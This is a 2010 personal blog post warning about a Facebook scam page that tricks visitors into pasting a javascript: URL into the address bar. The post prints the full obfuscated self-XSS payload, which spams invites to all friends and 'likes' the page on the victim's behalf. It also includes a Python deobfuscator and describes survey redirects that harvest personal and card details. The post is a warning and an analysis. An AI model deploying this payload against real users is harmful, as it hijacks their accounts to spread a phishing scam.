About Me

Narendran C R
London, UK
Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw that one of my friends had "Liked" the page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends whom I respect a lot, and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page; moreover, I like solving puzzles, and with the title "Only 4% of Harvard grads"!!! no words to explain.


The first page had the question and I started reading... When I reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah blah blah... and when I finished reading the question, the answers in my mind were contradicting each other. Maybe that is why only 4% of Harvard grads could solve this, I thought. Until now I had no second thoughts.

When I moved on to the second page it asked me to press a series of keys. I started feeling suspicious about it. It asked me to press a series of keys: first press and hold the "ctrl" key and then "c". Almost everyone would know that it is the shortcut to copy something, and I knew it would not work for me as I am using an Apple Mac machine. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell is it copying!!! I did not select anything)
2. Press alt + d (Haaa! this doesn't work on Mac either. It is the "go to the address bar" command for Windows... but I still don't know what is supposed to be copied, and I am now sure it is bogus)
3. Last step, ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I was more curious to know what kind of attack it was. Immediately I switched over to my Windows machine, made sure that I was not logged in, and visited the page "Only 4% of harvard grads can solve this riddle...". As instructed I copied the content, but didn't paste it in the address bar; instead I used TextPad to analyse the content (typical software engineer ;p). I didn't want to spend much time interpreting it as I was in the middle of documenting my dissertation. Thinking smartly (:D I have to say it myself!!), I concluded that the JavaScript will post a message on your wall that you like the page, and your friends can see it and become victims :D. If anyone wants the script, see below.
/************** Javascript ******************************/
/* Payload captured from the page's "press ctrl+c" step: a javascript: URL meant
   to be pasted into the address bar while logged in to Facebook. The body is
   packed with the common p,a,c,k,e,r obfuscator; eval() rebuilds the real
   script, which hides the app's wrapper element, injects app-supplied HTML,
   clicks the "suggest" control, selects all friends, submits the invite
   dialog and finally clicks "likeme" on the victim's behalf. */
javascript:(
function()
{
    /* element ids belonging to the malicious Facebook app */
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    /* standard p,a,c,k,e,r unpacker: p = packed source, a = radix, c = keyword count,
       k = keyword table; each whole-word token e(i) in p is replaced by k[i] */
    eval(function(p,a,c,k,e,r)
        {
            /* e(c): token for keyword index c (0-9a-z, then A-Z as charCode c+29) */
            e=function(c)
            {
                return(c>35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    /* packed source: the string array holds property and id names as \xHH escapes */
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
/************************ end of script **********************************/
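To read a payload of this shape in a text editor instead of pasting it into a browser, the p,a,c,k,e,r substitution can be reversed statically and the \xHH string table decoded. The following Python unpacker is an added example, not code from the post or from the packer's author; it runs on a constructed miniature in the same format (for the captured script the arguments would be its p string, 62, 69 and the '|'-separated keyword list).

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def encode_token(c: int, radix: int = 62) -> str:
    """Mirror of the packer's e(c): base-`radix` digits 0-9a-z, then A-Z as chr(c+29)."""
    prefix = "" if c < radix else encode_token(c // radix, radix)
    c %= radix
    return prefix + (chr(c + 29) if c > 35 else DIGITS[c])

def unpack(p: str, a: int, c: int, k: str) -> str:
    """Undo eval(function(p,a,c,k,e,r){...}): every whole-word token encode_token(i)
    in p becomes keyword k[i]; k is the '|'-joined table the JS splits itself."""
    words = k.split("|")
    for i in range(c - 1, -1, -1):          # the JS loop is: while(c--) if(k[c]) ...
        if i < len(words) and words[i]:
            pattern = r"\b" + re.escape(encode_token(i, a)) + r"\b"
            p = re.sub(pattern, lambda _m, w=words[i]: w, p)
    return p

def decode_hex_escapes(js: str) -> str:
    """Turn the \\xHH escapes the string array is built from back into plain text."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), js)

def inline_string_table(js: str) -> str:
    """Replace name[N] lookups with the literal from a leading `var name=[...];`
    so property names and element ids read plainly."""
    head = re.match(r"var\s+(\w+)=\[(.*?)\];", js)
    if not head:
        return js
    name, table = head.group(1), re.findall(r'"([^"]*)"', head.group(2))
    rest = js[head.end():]
    return re.sub(r"\b" + re.escape(name) + r"\[(\d+)\]",
                  lambda m: '"' + table[int(m.group(1))] + '"', rest)

def deobfuscate(p: str, a: int, c: int, k: str) -> str:
    return inline_string_table(decode_hex_escapes(unpack(p, a, c, k)))

# Constructed miniature in the same format as the captured payload (not the real one):
# single-letter tokens stand for keywords, and the string array is written as \xHH escapes.
SAMPLE_P = r'q e=["\l\g\j\g\m\g\i\g\h\n","\o\g\p\p\f\k"];d=r;d.s(t).u[e[0]]=e[1];'
SAMPLE_K = "|" * 15 + "x65|x69|x74|x6C|x73|x6E|x76|x62|x79|x68|x64|var|document|getElementById|mw|style"

if __name__ == "__main__":
    print(unpack(SAMPLE_P, 62, 31, SAMPLE_K))        # stage 1: keywords restored
    print(deobfuscate(SAMPLE_P, 62, 31, SAMPLE_K))   # stage 3: readable DOM call
```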

Wait... the attack is still not complete. The motive of this attack is not just getting visitors to the page. It has still not revealed the answer!!! In fact there is no answer to the question. It will ask you to take a survey and redirect you to different survey pages like "prizes .uk .com", "rewardstoday .co .uk" (spaces intentionally left so that you don't become a victim :p) where you will be asked for information like your email address, name, phone number etc. and even your credit card number :D.

Anyway, there is no answer to the question, so you don't have to worry about it...

There are already about 87,223 victims, and we don't really know how many of them gave out their personal information or credit card information!!! Each time I hit refresh it increases by at least 50!!! I realized the potential of social media...

Now, why did I write this blog? Hoping that this might educate some people who are innocent and might become victims.

What can we do? Visit the page "Only 4% of harvard grads can solve this riddle...", scroll to the bottom and report the page so that we help get these pages taken down.

Thank you very much for taking your time...
